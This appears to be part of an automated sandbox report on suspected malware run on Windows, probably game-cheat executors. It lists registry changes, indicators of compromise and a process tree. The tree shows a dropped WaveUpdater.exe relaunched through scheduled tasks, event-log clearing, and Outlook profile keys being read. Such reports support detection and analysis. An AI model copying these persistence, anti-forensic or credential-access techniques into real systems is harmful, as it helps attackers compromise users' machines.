Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txy	ApplicationFrameHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2 = 64003100000000006a594ab0100057415645494e7e3100004c0009000400efbe6a5946b06a594bb02e000000b13d020000000c000000000000000000000000000000706f5e00570061007600650049006e007300740061006c006c0065007200000018000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

pid	Process
2236	reg.exe
6048	reg.exe
2232	reg.exe
3040	reg.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 577776.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 634231.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 2765.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 331010.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 8 IoCs

ransomware

pid	Process
2344	NOTEPAD.EXE
4160	NOTEPAD.EXE
3896	NOTEPAD.EXE
4076	NOTEPAD.EXE
5896	NOTEPAD.EXE
1868	NOTEPAD.EXE
3512	NOTEPAD.EXE
3092	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5332	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5256	schtasks.exe
5060	schtasks.exe
4836	schtasks.exe
4164	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
2220	XClient.exe
3464	Explorer.EXE
3464	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2188	msedge.exe
2188	msedge.exe
736	msedge.exe
736	msedge.exe
468	identity_helper.exe
468	identity_helper.exe
5580	msedge.exe
5580	msedge.exe
3112	Kiwi X External.exe
5920	Kiwi X External.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
6056	Kiwi X External.exe
1760	taskmgr.exe
3320	Kiwi X External.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
1716	OpenWith.exe
1760	taskmgr.exe
3464	Explorer.EXE
2220	XClient.exe
2460	taskhostw.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe
4656	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5828	7zG.exe
Token: 35	5828	7zG.exe
Token: SeSecurityPrivilege	5828	7zG.exe
Token: SeSecurityPrivilege	5828	7zG.exe
Token: SeDebugPrivilege	3112	Kiwi X External.exe
Token: SeRestorePrivilege	5684	7zG.exe
Token: 35	5684	7zG.exe
Token: SeSecurityPrivilege	5684	7zG.exe
Token: SeSecurityPrivilege	5684	7zG.exe
Token: SeDebugPrivilege	5920	Kiwi X External.exe
Token: SeDebugPrivilege	1760	taskmgr.exe
Token: SeSystemProfilePrivilege	1760	taskmgr.exe
Token: SeCreateGlobalPrivilege	1760	taskmgr.exe
Token: SeDebugPrivilege	6056	Kiwi X External.exe
Token: SeDebugPrivilege	3320	Kiwi X External.exe
Token: SeDebugPrivilege	5632	fluxus.exe
Token: SeDebugPrivilege	1128	fluxus.exe
Token: SeRestorePrivilege	1276	7zG.exe
Token: 35	1276	7zG.exe
Token: SeSecurityPrivilege	1276	7zG.exe
Token: SeSecurityPrivilege	1276	7zG.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeRestorePrivilege	5184	7zG.exe
Token: 35	5184	7zG.exe
Token: SeSecurityPrivilege	5184	7zG.exe
Token: SeSecurityPrivilege	5184	7zG.exe
Token: SeShutdownPrivilege	6024	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6024	msiexec.exe
Token: SeSecurityPrivilege	5340	msiexec.exe
Token: SeCreateTokenPrivilege	6024	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	6024	msiexec.exe
Token: SeLockMemoryPrivilege	6024	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6024	msiexec.exe
Token: SeMachineAccountPrivilege	6024	msiexec.exe
Token: SeTcbPrivilege	6024	msiexec.exe
Token: SeSecurityPrivilege	6024	msiexec.exe
Token: SeTakeOwnershipPrivilege	6024	msiexec.exe
Token: SeLoadDriverPrivilege	6024	msiexec.exe
Token: SeSystemProfilePrivilege	6024	msiexec.exe
Token: SeSystemtimePrivilege	6024	msiexec.exe
Token: SeProfSingleProcessPrivilege	6024	msiexec.exe
Token: SeIncBasePriorityPrivilege	6024	msiexec.exe
Token: SeCreatePagefilePrivilege	6024	msiexec.exe
Token: SeCreatePermanentPrivilege	6024	msiexec.exe
Token: SeBackupPrivilege	6024	msiexec.exe
Token: SeRestorePrivilege	6024	msiexec.exe
Token: SeShutdownPrivilege	6024	msiexec.exe
Token: SeDebugPrivilege	6024	msiexec.exe
Token: SeAuditPrivilege	6024	msiexec.exe
Token: SeSystemEnvironmentPrivilege	6024	msiexec.exe
Token: SeChangeNotifyPrivilege	6024	msiexec.exe
Token: SeRemoteShutdownPrivilege	6024	msiexec.exe
Token: SeUndockPrivilege	6024	msiexec.exe
Token: SeSyncAgentPrivilege	6024	msiexec.exe
Token: SeEnableDelegationPrivilege	6024	msiexec.exe
Token: SeManageVolumePrivilege	6024	msiexec.exe
Token: SeImpersonatePrivilege	6024	msiexec.exe
Token: SeCreateGlobalPrivilege	6024	msiexec.exe
Token: SeRestorePrivilege	5452	7zG.exe
Token: 35	5452	7zG.exe
Token: SeSecurityPrivilege	5452	7zG.exe
Token: SeSecurityPrivilege	5452	7zG.exe
Token: SeDebugPrivilege	5492	WaveInstaller.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
5828	7zG.exe
5684	7zG.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
736	msedge.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
1716	OpenWith.exe
2220	XClient.exe
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
5440	Conhost.exe
3464	Explorer.EXE
3464	Explorer.EXE
5240	Conhost.exe
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
1728	Conhost.exe
3464	Explorer.EXE
3464	Explorer.EXE
1436	SystemSettings.exe
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3464	Explorer.EXE
3628	troubleshoot.exe
4840	troubleshoot.exe
5872	Conhost.exe
5560	Conhost.exe

Suspicious use of UnmapMainImage 8 IoCs

pid	Process
4024	RuntimeBroker.exe
4148	RuntimeBroker.exe
2944	sihost.exe
3944	RuntimeBroker.exe
4148	RuntimeBroker.exe
4148	RuntimeBroker.exe
4024	RuntimeBroker.exe
4148	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 736 wrote to memory of 1508	736	msedge.exe	83
PID 736 wrote to memory of 1508	736	msedge.exe	83
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 408	736	msedge.exe	84
PID 736 wrote to memory of 2188	736	msedge.exe	85
PID 736 wrote to memory of 2188	736	msedge.exe	85
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86
PID 736 wrote to memory of 760	736	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	setup7.0.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1192
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2460
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:2172
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:4820
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:4444
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:1076
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:1408
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:3128
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:3724
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:1332
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:5432
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:5656
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:3516
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:5484
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:3400
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  PID:5944
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  PID:2152
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  PID:1576
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  PID:2620
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  PID:6004
- C:\ProgramData\WaveUpdater.exe
  C:\ProgramData\WaveUpdater.exe
  2⤵
  PID:3696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1380

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1560
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  - Suspicious use of UnmapMainImage
  PID:2944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1784
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x4b4 0x518
